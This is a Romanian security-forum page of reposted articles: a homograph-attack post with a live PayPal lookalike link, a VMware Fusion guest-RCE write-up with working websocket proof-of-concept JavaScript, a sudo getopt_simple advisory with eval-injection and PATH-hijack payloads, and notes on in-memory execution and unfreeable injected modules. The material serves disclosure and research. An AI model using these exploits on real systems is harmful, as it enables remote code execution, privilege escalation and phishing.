ASCII will be: https://www.blazeinfosec.com https://www.xn--blzeinfosec-zij.com As the 'a' in the second URL is actually 'а' in Cyrillic, so a translation into Punycode is required. Registration of homograph domains Initially in Internationalized Domain Names version 1, it was possible to register a combination of ASCII and Unicode into the same domain. This clearly presented a security problem and it is no longer true since the adoption of IDN version 2 and 3, which further locked down the registration of Unicode domain names. Most notably, it instructed gTLDs to prevent the registration of domain names that contain mixed scripts (e.g., Latin and Kanji characters in the same string). Although many top-level domain registrars restrict mixed scripts, history have shown in practice the possibility to register similar looking domains in a single script - which is the currently allowed practice by many gTLD registrars. Just as an example, the domains apple.com and paypal.com have Cyrillic homograph counterparts and were registered by security researchers in the past as a proof of concept of homograph issues in web browsers. Logan McDonald wrote ha-finder a tool that takes the Top 1 million websites and checks if letters in each are confusable with Latin or decimal, performs a WHOIS lookup and tells you whether it is available for registration or not. Homograph attacks Although ICANN was aware of the potential risks of homograph attacks since the introduction of IDN, one of the first real demonstrations of a practical IDN homograph attack is believed to have been discovered in 2005 by 3ric Johanson of Shmoo Group. The details of the issue was described in this Bugzilla ticket and affected many other browsers at the time. Another implication of Unicode homographs, but not directly related to the issue described in this blog post, was the attack documented against Spotify in their engineering blog, where a researcher discovered how to take over user accounts due to the improper conversion and canonicalization of Unicode-based usernames in their ASCII counterparts. More recently similar phishing were spotted in the wild against users of the cryptocurrency exchange MyEtherWallet, Github and in 2018 Apple fixed a bug CVE-2018-4277 in Safari, discovered by Tencent Labs, where the small Latin letter 'ꝱ' (dum) was rendered in the URL bar exactly like the character 'd'. Browsers have different strategies to handle IDN. Depending on the configuration, some of them will show the Unicode in order to provide a more friendly user experience. They also have different IDN display algorithms - Google Chrome's algorithm can be found here. It performs checks on the gTLD where the domain is registered on, and also verifies if the characters are in a list of Cyrillic confusable. Firefox, including Tor Browser with its default configuration, implements a far less strict algorithm that will simply display Unicode characters in their intended scripts, even if they are Latin confusable. These are certainly not enough to protect users and it is not difficult to pull off a practical example: just click https://www.раураӏ.com to be taken to a website in which the URL bar will show https://www.paypal.com but it is not at all the original PayPal. This presents a clear problem for users of Firefox and consequently Tor Browser. Many attempts to change these two browsers behavior when displaying IDNs have happened in the past, including tickets for Firefox and for Tor Browser -- these tickets have been open since early 2017. Attacking Signal, Telegram and Tor Browser with homographs The vast majority of prior research on this topic has been centred around browsers and e-mail clients. Therefore, we decided to look into different vectors where homographs could be leveraged, whether fully or partially, for successful attacks. Oftentimes, the threat model of individuals that use privacy-oriented messenger platform such as Signal and Telegram includes not clicking links sent via SMS or instant messengers, as it has proven to be the initial attack vector in a chain of exploits to compromise a mobile target, for instance. As mentioned earlier in this article, depending on the font and the size used to display the text it may be rendered on the screen in a visually indistinguishable way, making it impossible for a human user to tell apart a legitimate URL from a malicious link. Attack steps Adversary acquires a homograph domain name similar to the attack suitable domain name Adversary hosts malicious content (e.g., phishing or a browser exploit) in the web server serving this URL Adversary sends a link containing a malicious, homograph URL to the target Target clicks the link, believing it to be a legitimate URL it trusts, given there is no way to visually tell apart legitimate and malicious URLs Malicious activity happens Below we can see how Signal Android and Desktop, respectively, rendered messages with links containing homograph characters: Telegram went as far as making the preview of the fake website, and rendered the link in a way impossible for a human to tell it is malicious: Until recently, many browsers have been vulnerable to these attacks and displayed homograph links in the URL bar in a Latin-looking fashion, as opposed to the expected Punycode. Firefox, on the other hand, by default tries to be user friendly and in many cases does not show Punycode, leaving its users vulnerable to such attacks. Tor Browser, as already mentioned, is based on Firefox and this allows for a full attack chain against users of Signal and Telegram. Given the privacy concerns and threat model of the users of these instant messengers, it is likely many of them will be using Tor Browser for their browsing, therefore making them vulnerable to a full-chain homograph attack. Signal + Tor Browser attack: Telegram + Tor Browser attack: The bugs we found in Signal and Telegram have been assigned CVE-2019-9970 and CVE-2019-10044, respectively. The advisories can be found in our Github advisories page. Other popular instant messengers, like Slack, Facebook Messenger and WhatsApp were not vulnerable to this class of attack during our experiments. Latest versions of WhatsApp go as far as showing a label in the link to warn users it can be malicious, where other messengers simply render the link un-clickable. Conclusion Confusable homographs are a class of attacks against Internet users that has been around for nearly two decades now since the advent of Unicode in domain names. The risks of homographs in computer security have been known and relatively well understood, yet we keep seeing homograph-related attacks resurfacing every now and then. Even though they have been around for a while, very little attention has been given to this class of attacks as they are generally seen as not so harmful, and usually falls into the category of social engineering - which is not always part of threat models of many applications and it is frequently assumed the user should take care of it; but we believe applications can do better. Finally, application security teams should step up their game and be proactive at preventing such attacks from happening (like Google did with Chrome), instead of pointing the blame to registrars, relying on user awareness to not bite the bait or waiting for ICANN to come up with a magic solution to the problem. References [1] https://krebsonsecurity.com/2018/03/look-alike-domains-and-visual-confusion/ [2] https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/ [3] https://bugzilla.mozilla.org/show_bug.cgi?id=279099 [4] https://www.phish.ai/2018/03/13/idn-homograph-attack-back-crypto/ [5] https://dev.to/loganmeetsworld/homographs-attack--5a1p [6] https://www.unicode.org/Public/security/latest/confusables.txt [7] https://labs.spotify.com/2013/06/18/creative-usernames [8] https://xlab.tencent.com/en/2018/11/13/cve-2018-4277 [9] https://urlscan.io/result/0c6b86a5-3115-43d8-9389-d6562c6c49fa [10] https://www.xudongz.com/blog/2017/idn-phishing [11] https://github.com/loganmeetsworld/homographs-talk/tree/master/ha-finder [12] https://www.chromium.org/developers/design-documents/idn-in-google-chrome [13] https://wiki.mozilla.org/IDN_Display_Algorithm [14] https://www.ietf.org/rfc/rfc3492.txt [15] https://trac.torproject.org/projects/tor/ticket/21961 [16] https://bugzilla.mozilla.org/show_bug.cgi?id=1332714 Sursa: https://wildfire.blazeinfosec.com/what-you-see-is-not-what-you-get-when-homographs-attack/
      • 1
      • Upvote
  13. VMware Fusion 11 - Guest VM RCE - CVE-2019-5514 published 03-31-2019 00:00:00 TL;DR You can run an arbitrary command on a VMware Fusion guest VM through a website without any priory knowledge. Basically VMware Fusion is starting up a websocket listening only on the localhost. You can fully control all the VMs (also create/delete snapshots, whatever you want) through this websocket interface, including launching apps. You need to have VMware Tools installed on the guest for launching apps, but honestly who doesn’t have it installed. So with creating a javascript on a website, you can interact with the undocumented API, and yes it’s all unauthenticated. Original discovery I saw a tweet a couple of weeks ago from @CodeColorist: CodeColorist (@CodeColorist) on Twitter, talking about this issue - he was the one discovering it, but I didn’t have time to look into this for a while. When I searched it again, that tweet was removed. I found the same tweet on his Weibo account (~Chinese Twitter): CodeColorist Weibo. This is the screenshot he posted: What you can see here is that you can execute arbitrary commands on a guest VM through a web socket interface, which is started by amsrv process. I would like to give him full credits for this, what I did later is just building on top of this information. AMSRV I used ProcInfoExample GitHub - objective-see/ProcInfoExample: example project, utilizing Proc Info library to monitor what kind of processes are starting up, when running VMware Fusion. When you start VMware both vmrest (VMware REST API) and amsrv will be started: 2019-03-05 17:17:22.434 procInfoExample[10831:7776374] process start: pid: 10936 path: /Applications/VMware Fusion.app/Contents/Library/vmrest user: 501 args: ( "/Applications/VMware Fusion.app/Contents/Library/amsrv", "-D", "-p", 8698 ) 2019-03-05 17:17:22.390 procInfoExample[10831:7776374] process start: pid: 10935 path: /Applications/VMware Fusion.app/Contents/Library/amsrv user: 501 args: ( "/Applications/VMware Fusion.app/Contents/Library/amsrv", "-D", "-p", 8698 ) They seem to be related, especially because you can reach some undocumented VMware REST API calls through this port. As you can control the Application Menu through the amsrv process, I think this is something like “Application Menu Service”. If we navigate to /Applications/VMware Fusion.app/Contents/Library/VMware Fusion Applications Menu.app/Contents/Resources we can find a file called app.asar, and at the end of the file there is a node.js implementation related to this websocket that listens on port 8698. It’s pretty nice that you have the source code available in this file, so we don’t need to do hardcore reverse engineering. If we look at the code it reveals that indeed the VMware Fusion Application Menu will start this amsrv process on port 8698, or if that is busy it will try the next available open and so on. const startVMRest = async () => { log.info('Main#startVMRest'); if (vmrest != null) { log.warn('Main#vmrest is currently running.'); return; } const execSync = require('child_process').execSync; let port = 8698; // The default port of vmrest is 8697 let portFound = false; while (!portFound) { let stdout = execSync('lsof -i :' + port + ' | wc -l'); if (parseInt(stdout) == 0) { portFound = true; } else { port++; } } // Let's store the chosen port to global global['port'] = port; const spawn = require('child_process').spawn; vmrest = spawn(path.join(__dirname, '../../../../../', 'amsrv'), [ '-D', '-p', port ]); We can find the related logs in the VMware Fusion Application Menu logs: 2019-02-19 09:03:05:745 Renderer#WebSocketService::connect: (url: ws://localhost:8698/ws ) 2019-02-19 09:03:05:745 Renderer#WebSocketService::connect: Successfully connected (url: ws://localhost:8698/ws ) 2019-02-19 09:03:05:809 Renderer#ApiService::requestVMList: (url: http://localhost:8698/api/internal/vms ) This confirms the web socket and also a rest API interface. REST API - Leaking VM info If we navigate to the URL above (http://localhost:8698/api/internal/vms), we will get a nicely formatted JSON with the details of our VMs: [ { "id": "XXXXXXXXXXXXXXXXXXXXXXXXXX", "processors": -1, "memory": -1, "path": "/Users/csaby/VM/Windows 10 x64wHVCI.vmwarevm/Windows 10 x64.vmx", "cachePath": "/Users/csaby/VM/Windows 10 x64wHVCI.vmwarevm/startMenu.plist", "powerState": "unknown" } ] This is already an information leak where an attacker can get information about our user ID, folders, and VM names, and their basic information. The code below can be used to display information. If we put this JS into any website, and a host running Fusion visits it, we can query the REST API. var url = 'http://localhost:8698/api/internal/vms'; //A local page var xhr = new XMLHttpRequest(); xhr.open('GET', url, true); // If specified, responseType must be empty string or "text" xhr.responseType = 'text'; xhr.onload = function () { if (xhr.readyState === xhr.DONE) { if (xhr.status === 200) { console.log(xhr.response); //console.log(xhr.responseText); document.write(xhr.response) } } }; xhr.send(null); If we look more closely on the code, we find these additional URLs that will leak further info: '/api/vms/' + vm.id + '/ip' - This will give you the internal IP of the VM, but it will not work on an encrypted VM or if it’s powered off. '/api/internal/vms/' + vm.id - This is the same info you get via the first URL discussed, just limiting info to one VM. Websocket - RCE with vmUUID This is the original POC published by @CodeColorist. <script> ws = new WebSocket("ws://127.0.0.1:8698/ws"); ws.onopen = function() { const payload = { "name":"menu.onAction", "object":"11 22 33 44 55 66 77 88-99 aa bb cc dd ee ff 00", "userInfo": { "action":"launchGuestApp:", "vmUUID":"11 22 33 44 55 66 77 88-99 aa bb cc dd ee ff 00", "representedObject":"cmd.exe" } }; ws.send(JSON.stringify(payload)); }; ws.onmessage = function(data) { console.log(JSON.parse(data.data)); ws.close(); }; </script> In this POC you need the UUID of the VM to to start an application. The vmUUID is the bios.uuid that you can find in the vmx file. The ‘problem’ with this is that you can’t leak the vmUUID and brute forcing it would be practically impossible. You need to have VMware Tools installed on the guest for this to work, but who doesn’t have it? If the VM is suspended or shutted down, VMware will nicely start it for us. Also the command will be queued until the user logs in, so even if the screen is locked we will be able to run this command once the user logged in. After some experimentation I noticed that if I remove the object and vmUUID elements, the code execution still happens with the last used VM, so there is some state information saved. Websocket - infoleak After starting reversion and following the traces what web sockets will call, and what are the other options in the code, it started to be clear that you have full access to the application menu, and you can fully control everything. Checking the VMware Fusion binary it becomes clear that you have other menus with other options. aMenuupdate: 00000001003bedd2 db "menu.update", 0 ; DATA XREF=cfstring_menu_update aMenushow: 00000001003bedde db "menu.show", 0 ; DATA XREF=cfstring_menu_show aMenuupdatehotk: 00000001003bede8 db "menu.updateHotKey", 0 ; DATA XREF=cfstring_menu_updateHotKey aMenuonaction: 00000001003bedfa db "menu.onAction", 0 ; DATA XREF=cfstring_menu_onAction aMenurefresh: 00000001003bee08 db "menu.refresh", 0 ; DATA XREF=cfstring_menu_refresh aMenusettings: 00000001003bee15 db "menu.settings", 0 ; DATA XREF=cfstring_menu_settings aMenuselectinde: 00000001003bee23 db "menu.selectIndex", 0 ; DATA XREF=cfstring_menu_selectIndex aMenudidclose: 00000001003bee34 db "menu.didClose", 0 ; DATA XREF=cfstring_menu_didClose These can be all called through the WebSocket. I didn’t went ahead to discover every single option on every single menu, but you can pretty much do whatever you want (make snapshots, start VMs, delete VMs, etc…) if you know the vmUUID. This was a problem as I didn’t figure out how to get that, and without it, it’s not that useful. The next interesting option was menu.refresh. If we use the following payload: const payload = { "name":"menu.refresh", }; We will get back some details about the VMs and pinned apps, etc.. { "key": "menu.update", "value": { "vmList": [ { "name": "Kali 2018 Master (2018Q4)", "cachePath": "/Users/csaby/VM/Kali 2018 Master (2018Q4).vmwarevm/startMenu.plist" }, { "name": "macOS 10.14", "cachePath": "/Users/csaby/VM/macOS 10.14.vmwarevm/startMenu.plist" }, { "name": "Windows 10 x64", "cachePath": "/Users/csaby/VM/Windows 10 x64.vmwarevm/startMenu.plist" } ], "menu": { "pinnedApps": [], "frequentlyUsedApps": [ { "rawIcons": [ { (...) This is a bit less and more what we can see through the API discussed earlier. So more info leak. Websocket - full RCE (without vmUUID) The next interesting item was the menu.selectIndex, it suggested that you can select VMs, it even had a relatated code in the app.asar file, which told me how to call it: // Called when VM selection changed selectIndex(index: number) { log.info('Renderer#ActionService::selectIndex: (index:', index, ')'); if (this.checkIsFusionUIRunning()) { this.send({ name: 'menu.selectIndex', userInfo: { selectedIndex: index } }); } If we called this item, as suggested above, and then tried to launch an app in the guest, we could instruct which guest to run the app in. Basically we can select a VM with this call. const payload = { "name":"menu.selectIndex", "userInfo": { "selectedIndex":"3" } }; The next thing I tried if I can use the selectedIndex directly in the menu.onAction call, and it turned out that yes I can. It also became clear that the vmList I get with menu.refresh has the right order and indexes for each VM. In order to gain a full RCE: 1. Leak the list of VMs with menu.refresh 2. Launch an application on the guest by using the index The full POC: <script> ws = new WebSocket("ws://127.0.0.1:8698/ws"); ws.onopen = function() { //payload to show vm names and cache path const payload = { "name":"menu.refresh", }; ws.send(JSON.stringify(payload)); }; ws.onmessage = function(data) { //document.write(data.data); console.log(JSON.parse(data.data)); var j_son = JSON.parse(data.data); var vmlist = j_son.value.vmList; var i; for (i = 0; i < vmlist.length; i++) { //payload to launch an app, you can use either the vmUUID or the selectedIndex const payload = { "name":"menu.onAction", "userInfo": { "action":"launchGuestApp:", "selectedIndex":i, "representedObject":"cmd.exe" } }; if (vmlist[i].name.includes("Win") || vmlist[i].name.includes("win")) {ws.send(JSON.stringify(payload));} } ws.close(); }; </script> Reporting to VMware At this point I got in touch with @Codecolorist if he reported this to VMware, and he said that yes, they got in touch with him. I decided to send them another report, as I found this pretty serious and I wanted to urge them, especially because compared to the original POC I found a way to execute this attack without that. The Fix VMware released a fix, and advisory a couple of days ago: VMSA-2019-0005. I took a look at what they did, and essentially they implemented a token authentication, where the token is newly generated every single time starting up VMware. This is the related code for generating a token (taken from app.asar): String.prototype.pick = function(min, max) { var n, chars = ''; if (typeof max === 'undefined') { n = min; } else { n = min + Math.floor(Math.random() * (max - min + 1)); } for (var i = 0; i < n; i++) { chars += this.charAt(Math.floor(Math.random() * this.length)); } return chars; String.prototype.shuffle = function() { var array = this.split(''); var tmp, current, top = array.length; if (top) while (--top) { current = Math.floor(Math.random() * (top + 1)); tmp = array[current]; array[current] = array[top]; array[top] = tmp; } return array.join(''); export class Token { public static generate(): string { const specials = '!@#$%^&*()_+{}:"<>?|[];\',./`~'; const lowercase = 'abcdefghijklmnopqrstuvwxyz'; const uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; const numbers = '0123456789'; const all = specials + lowercase + uppercase + numbers; let token = ''; token += specials.pick(1); token += lowercase.pick(1); token += uppercase.pick(1); token += numbers.pick(1); token += all.pick(5, 7); token = token.shuffle(); return Buffer.from(token).toString('base64'); } The token will be a variable length password, containing at least 1 character from app, lower case, numbers and symbols. It will be base64 encoded then, we can see it in Wireshark, when VMware uses this: And we can also see it being used in the code: function sendVmrestReady() { log.info('Main#sendVmrestReady'); if (mainWindow) { mainWindow.webContents.send('vmrestReady', [ 'ws://localhost:' + global['port'] + '/ws?token=' + token, 'http://localhost:' + global['port'], '?token=' + token ]); } In case you have code execution on a mac you can probably figure this token out, but in that case it doesn’t really matter anyway. The password will essentially limit the ability to exploit the vulnerability remotely. With some experiments, I also found that you need to set the Origin in the Header to file://, otherwise it will be forbidden, but that you can’t set via normal JS calls, as it will be set by the browser. Like this: Origin: file:// So even if you know the token, you can’t trigger this via normal webpages. Sursa: https://theevilbit.github.io/posts/vmware_fusion_11_guest_vm_rce_cve-2019-5514/
      • 1
      • Thanks
  14. memrun Small tool written in Golang to run ELF (x86_64) binaries from memory with a given process name. Works on Linux where kernel version is >= 3.17 (relies on the memfd_create syscall). Usage Build it with $ go build memrun.go and execute it. The first argument is the process name (string) you want to see in ps auxww output for example. Second argument is the path for the ELF binary you want to run from memory. Usage: memrun process_name elf_binary Sursa: https://github.com/guitmz/memrun
      • 1
      • Upvote
  15. Performing Concolic Execution on Cryptographic Primitives Post April 1, 2019 Leave a comment Alan Cao For my winternship and springternship at Trail of Bits, I researched novel techniques for symbolic execution on cryptographic protocols. I analyzed various implementation-level bugs in cryptographic libraries, and built a prototype Manticore-based concolic unit testing tool, Sandshrew, that analyzed C cryptographic primitives under a symbolic and concrete environment. Sandshrew is a first step for crypto developers to easily create powerful unit test cases for their implementations, backed by advancements in symbolic execution. While it can be used as a security tool to discover bugs, it also can be used as a framework for cryptographic verification. Playing with Cryptographic Verification When choosing and implementing crypto, our trust should lie in whether or not the implementation is formally verified. This is crucial, since crypto implementations often introduce new classes of bugs like bignum vulnerabilities, which can appear probabilistically. Therefore, by ensuring verification, we are also ensuring functional correctness of our implementation. There are a few ways we could check our crypto for verification: Traditional fuzzing. We can use fuzz testing tools like AFL and libFuzzer. This is not optimal for coverage, as finding deeper classes of bugs requires time. In addition, since they are random tools, they aren’t exactly “formal verification,” so much as a sotchastic approximation thereof. Extracting model abstractions. We can lift source code into cryptographic models that can be verified with proof languages. This requires learning purely academic tools and languages, and having a sound translation. Just use a verified implementation! Instead of trying to prove our code, let’s just use something that is already formally verified, like Project Everest’s HACL* library. This strips away configurability when designing protocols and applications, as we are only limited to what the library offers (i.e HACL* doesn’t implement Bitcoin’s secp256k1 curve). What about symbolic execution? Due to its ability to exhaustively explore all paths in a program, using symbolic execution to analyze cryptographic libraries can be very beneficial. It can efficiently discover bugs, guarantee coverage, and ensure verification. However, this is still an immense area of research that has yielded only a sparse number of working implementations. Why? Because cryptographic primitives often rely on properties that a symbolic execution engine may not be able to emulate. This can include the use of pseudorandom sources and platform-specific optimized assembly instructions. These contribute to complex SMT queries passed to the engine, resulting in path explosion and a significant slowdown during runtime. One way to address this is by using concolic execution. Concolic execution mixes symbolic and concrete execution, where portions of code execution can be “concretized,” or run without the presence of a symbolic executor. We harness this ability of concretization in order to maximize coverage on code paths without SMT timeouts, making this a viable strategy for approaching crypto verification. Introducing sandshrew After realizing the shortcomings in cryptographic symbolic execution, I decided to write a prototype concolic unit testing tool, sandshrew. sandshrew verifies crypto by checking equivalence between a target unverified implementation and a benchmark verified implementation through small C test cases. These are then analyzed with concolic execution, using Manticore and Unicorn to execute instructions both symbolically and concretely. Fig 1. Sample OpenSSL test case with a SANDSHREW_* wrapper over the MD5() function. Writing Test Cases We first write and compile a test case that tests an individual cryptographic primitive or function for equivalence against another implementation. The example shown in Figure 1 tests for a hash collision for a plaintext input, by implementing a libFuzzer-style wrapper over the MD5() function from OpenSSL. Wrappers signify to sandshrew that the primitive they wrap should be concretized during analysis. Performing Concretization Sandshrew leverages a symbolic environment through the robust Manticore binary API. I implemented the manticore.resolve() feature for ELF symbol resolution and used it to determine memory locations for user-written SANDSHREW_* functions from the GOT/PLT of the test case binary. Fig 2. Using Manticore’s UnicornEmulator feature in order to concretize a call instruction to the target crypto primitive. Once Manticore resolves out the wrapper functions, hooks are attached to the target crypto primitives in the binary for concretization. As seen in Figure 2, we then harness Manticore’s Unicorn fallback instruction emulator, UnicornEmulator, to emulate the call instruction made to the crypto primitive. UnicornEmulator concretizes symbolic inputs in the current state, executes the instruction under Unicorn, and stores modified registers back to the Manticore state. All seems well, except this: if all the symbolic inputs are concretized, what will be solved after the concretization of the call instruction? Restoring Symbolic State Before our program tests implementations for equivalence, we introduce an unconstrained symbolic variable as the returned output from our concretized function. This variable guarantees a new symbolic input that continues to drive execution, but does not contain previously collected constraints. Mathy Vanhoef (2018) takes this approach to analyze cryptographic protocols over the WPA2 protocol. We do this in order to avoid the problem of timeouts due to complex SMT queries. Fig 3. Writing a new unconstrained symbolic value into memory after concretization. As seen in Figure 3, this is implemented through the concrete_checker hook at the SANDSHREW_* symbol, which performs the unconstrained re-symbolication if the hook detects the presence of symbolic input being passed to the wrapper. Once symbolic state is restored, sandshrew is then able to continue to execute symbolically with Manticore, forking once it has reached the equivalence checking portion of the program, and generating solver solutions. Results Here is Sandshrew performing analysis on the example MD5 hash collision program from earlier: The prototype implementation of Sandshrew currently exists here. With it comes a suite of test cases that check equivalence between a few real-world implementation libraries and the primitives that they implement. Limitations Sandshrew has a sizable test suite for critical cryptographic primitives. However, analysis still becomes stuck for many of the test cases. This may be due to the large statespace needing to be explored for symbolic inputs. Arriving at a solution is probabilistic, as the Manticore z3 interface often times out. With this, we can identify several areas of improvement for the future: Add support for allowing users to supply concrete input sets to check before symbolic execution. With a proper input generator (i.e., radamsa), this potentially hybridizes Sandshrew into a fuzzer as well. Implement Manticore function models for common cryptographic operations. This can increase performance during analysis and allows us to properly simulate execution under the Dolev-Yao verification model. Reduce unnecessary code branching using opportunistic state merging. Conclusion Sandshrew is an interesting approach at attacking the problem of cryptographic verification, and demonstrates the awesome features of the Manticore API for efficiently creating security testing tools. While it is still a prototype implementation and experimental, we invite you to contribute to its development, whether through optimizations or new example test cases. Thank you Working at Trail of Bits was an awesome experience, and offered me a lot of incentive to explore and learn new and exciting areas of security research. Working in an industry environment pushed me to understand difficult concepts and ideas, which I will take to my first year of college. Sursa: https://blog.trailofbits.com/2019/04/01/performing-concolic-execution-on-cryptographic-primitives/
      • 1
      • Upvote
  16. Make Your Dynamic Module Unfreeable (Anti-FreeLibrary) 1 minute read Let’s say your product injects a module into a target process, if the target process knows the existence of your module it can call FreeLibrary function to unload your module (assume that the reference count is one). One way to stay injected is to hook FreeLibrary function and check passed arguments every time the target process calls FreeLibrary. There is a way to get the same result without hooking. When a process uses FreeLibrary to free a loaded module, FreeLibrary calls LdrUnloadDll which is exported by ntdll: Inside LdrUnloadDll function, it checks the ProcessStaticImport field of LDR_DATA_TABLE_ENTRY structure to check if the module is dynamically loaded or not. The check happens inside LdrpDecrementNodeLoadCountLockHeld function: If ProcessStaticImport field is set, LdrpDecrementNodeLoadCountLockHeld returns without freeing the loaded module So, if we set the ProcessStaticImport field, FreeLibrary will not be able to unload our module: In this case, the module prints "Hello" every time it attaches to a process, and "Bye!" when it detaches. Note: There is an officially supported way of doing the same thing: Calling GetModuleHandleExA with GET_MODULE_HANDLE_EX_FLAG_PIN flag. "The module stays loaded until the process is terminated, no matter how many times FreeLibrary is called." Thanks to James Forshaw whoami: @_qaz_qaz Sursa: https://secrary.com/Random/anti_FreeLibrary/
      • 1
      • Upvote
  17. Azi e ultima zi pentru inscriere: http://www.cybersecuritychallenge.ro/
  18. Nytro

    Fun stuff

    https://9gag.com/gag/aMZXvB1
  19. Mai sunt doar cateva zile pentru inscriere. Eu zic ca o sa fie interesant si ca merita.
  20. Advisory: Code Execution via Insecure Shell Function getopt_simple RedTeam Pentesting discovered that the shell function "getopt_simple", as presented in the "Advanced Bash-Scripting Guide", allows execution of attacker-controlled commands. Details ======= Product: Advanced Bash-Scripting Guide Affected Versions: all Fixed Versions: - Vulnerability Type: Code Execution Security Risk: medium Vendor URL: https://www.tldp.org/LDP/abs/html/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-007 Advisory Status: private CVE: CVE-2019-9891 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9891 Introduction ============ The document "Advanced Bash-Scripting Guide" [1] is a tutorial for writing shell scripts for Bash. It contains many example scripts together with in-depth explanations about how shell scripting works. More Details ============ During a penetration test, RedTeam Pentesting was able to execute commands as an unprivileged user (www-data) on a server. Among others, it was discovered that this user was permitted to run the shell script "cleanup.sh" as root via "sudo": ------------------------------------------------------------------------ $ sudo -l Matching Defaults entries for user on srv: env_reset, secure_path=/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on srv: (root) NOPASSWD: /usr/local/sbin/cleanup.sh ------------------------------------------------------------------------ The script "cleanup.sh" starts with the following code: ------------------------------------------------------------------------ #!/bin/bash getopt_simple() { until [ -z "$1" ] do if [ ${1:0:2} = '--' ] then tmp=${1:2} # Strip off leading '--' . . . parameter=${tmp%%=*} # Extract name. value=${tmp##*=} # Extract value. eval $parameter=$value fi shift done } target=/tmp # Pass all options to getopt_simple(). getopt_simple $* # list files to clean echo "listing files in $target" find "$target" -mtime 1 ------------------------------------------------------------------------ The function "getopt_simple" is used to set variables based on command-line flags which are passed to the script. Calling the script with the argument "--target=/tmp" sets the variable "$target" to the value "/tmp". The variable's value is then used in a call to "find". The source code of the "getopt_simple" function has been taken from the "Advanced Bash-Scripting Guide" [2]. It was also published as a book. RedTeam Pentesting identified two different ways to exploit this function in order to run attacker-controlled commands as root. First, a flag can be specified in which either the name or the value contain a shell command. The call to "eval" will simply execute this command. ------------------------------------------------------------------------ $ sudo /usr/local/sbin/cleanup.sh '--redteam=foo;id' uid=0(root) gid=0(root) groups=0(root) listing files in /tmp $ sudo /usr/local/sbin/cleanup.sh '--target=$(id)' listing files in uid=0(root) gid=0(root) groups=0(root) find: 'uid=0(root) gid=0(root) groups=0(root)': No such file or directory $ sudo /usr/local/sbin/cleanup.sh '--target=$(ls${IFS}/)' listing files in bin boot dev etc [...] ------------------------------------------------------------------------ Instead of injecting shell commands, the script can also be exploited by overwriting the "$PATH" variable: ------------------------------------------------------------------------ $ mkdir /tmp/redteam $ cat <<EOF > /tmp/redteam/find #!/bin/sh echo "executed as root:" /usr/bin/id EOF $ chmod +x /tmp/redteam/find $ sudo /usr/local/sbin/cleanup.sh --PATH=/tmp/redteam listing files in /tmp executed as root: uid=0(root) gid=0(root) groups=0(root) ------------------------------------------------------------------------ Workaround ========== No workaround available. Fix === Replace the function "getopt_simple" with the built-in function "getopts" or the program "getopt" from the util-linux package. Examples on how to do so are included in the same tutorial [3][4]. Security Risk ============= If a script with attacker-controlled arguments uses the "getopt_simple" function, arbitrary commands may be invoked by the attackers. This is particularly interesting if a privilege boundary is crossed, for example in the context of "sudo". Overall, this vulnerability is rated as a medium risk. Timeline ======== 2019-02-18 Vulnerability identified 2019-03-20 Customer approved disclosure to vendor 2019-03-20 Author notified 2019-03-20 Author responded, document is not updated/maintained any more 2019-03-20 CVE ID requested 2019-03-21 CVE ID assigned 2019-03-26 Advisory released References ========== [1] https://www.tldp.org/LDP/abs/html/ [2] https://www.tldp.org/LDP/abs/html/string-manipulation.html#GETOPTSIMPLE [3] https://www.tldp.org/LDP/abs/html/internal.html#EX33 [4] https://www.tldp.org/LDP/abs/html/extmisc.html#EX33A RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen Sursa: Bugtraq
      • 1
      • Upvote
  21. Adio internet așa cum îl știm. Articolul 11 și Articolul 13 au fost acceptate. BY IULIAN MOCANU ON 26/03/2019 Pe parcursul zilei de 26 martie 2019 a avut loc votul decisiv în Parlamentul European pentru noua legislație de copyright din piața unică digitală a Uniunii Europene. Votul a fost precedat de o propunere prin care Articolul 11 și Articolul 13 ar fi fost supuse la vot individual pentru a determina dacă acestea vor fi sau nu parte din legislație. Acestă propunere a rezultat într-un vot ce s-a încheiat cu 312 în favoarea revizuirii celor două articole și 317 în favoarea acceptării lor așa cum sunt. Pentru ceva context, dacă 3 din cei 12 reprezentanți ai României din Parlamentul European, care au votat împotriva acestei propuneri, ar fi fost în favoarea sa, atunci legislația nu ar fi trecut la vot direct fără să fie luate iarăși în discuție articolele cu pricina. În lipsa acestui pas adițional, legislația a fost supusă la un vot ce s-a încheiat cu 348 de membri ai parlamentului exprimându-și aprobarea, iar 274 exprimând dezaprobarea. Rezultatul este acceptarea sa în forma curentă. Puteți găsi aici un document detaliat cu voturile efective. La origini, legislația era menită să ofere ceva mai multă putere de negociere și control creatorilor de conținut și deținătorilor de proprietăți intelectuale. Însă, conform criticilor, forma actuală face opusul. Articolele 11 și 13 ar putea avea efecte foarte nocive asupra a orice înseamnă competiție pentru rețelele sociale existente, sau pentru platformele de livrate conținut generat de utilizatori. Mai există un pas înainte de implementarea sa efectivă, un vot în Consiliul Uniunii Europene ce va avea loc în ziua de 9 aprilie. Dacă nu se va obține o majoritate la acea dată, tot există speranța ca legislația să nu fie adoptată în forma sa actuală și să reintre în negocieri după alegerile euro-parlamentare din luna mai. Implementarea efectivă a noii legislații oricum va dura ceva timp, iar forma exactă în care vor fi implementate diversele articole ar putea fi modificate, la un moment Germania considerând posibilitatea de a renunța la partea de filtre de internet pentru varianta sa a legislației. Dacă vă întrebați „Cum poate fi o piață unică digitală dacă unele țări pot decide să nu aibă filtre de internet”, ați demonstrat deja mai multă capacitate de gândire decât câteva sute de oameni trimiși prin vot public în Parlamentul European. Consecințele acestei noi legislații se vor contura pe parcursul următoarelor luni. Puteți citi aici 